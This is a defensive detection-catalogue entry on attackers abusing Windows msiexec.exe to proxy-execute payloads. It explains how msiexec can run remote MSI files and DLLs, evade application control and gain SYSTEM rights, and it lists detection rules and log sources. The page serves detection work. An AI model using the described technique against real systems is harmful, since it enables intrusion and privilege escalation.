Analytics Story: Windows System Binary Proxy Execution MSIExec
Description
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).
Why it matters
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.
Detections
| Name | Technique | Type |
|---|---|---|
| Windows MSIExec Remote Download | Msiexec | Anomaly |
| Windows HTTP Network Communication From MSIExec | Msiexec | Anomaly |
| Windows MSIExec DLLRegisterServer | Msiexec | TTP |
| Windows MSIExec Unregister DLLRegisterServer | Msiexec | TTP |
| Windows MSIExec Spawn Discovery Command | Msiexec | Anomaly |
Data Sources
| Name | Platform | Sourcetype | Source |
|---|---|---|---|
| CrowdStrike ProcessRollup2 | Other | crowdstrike:events:sensor |
crowdstrike |
| Sysmon EventID 1 |  Windows |
XmlWinEventLog |
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Windows Event Log Security 4688 | Windows |
XmlWinEventLog |
XmlWinEventLog:Security |
| Cisco Network Visibility Module Flow Data |  Network |
cisco:nvm:flowdata |
not_applicable |
| Sysmon EventID 3 | Windows |
XmlWinEventLog |
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
References
Source: GitHub | Version: 2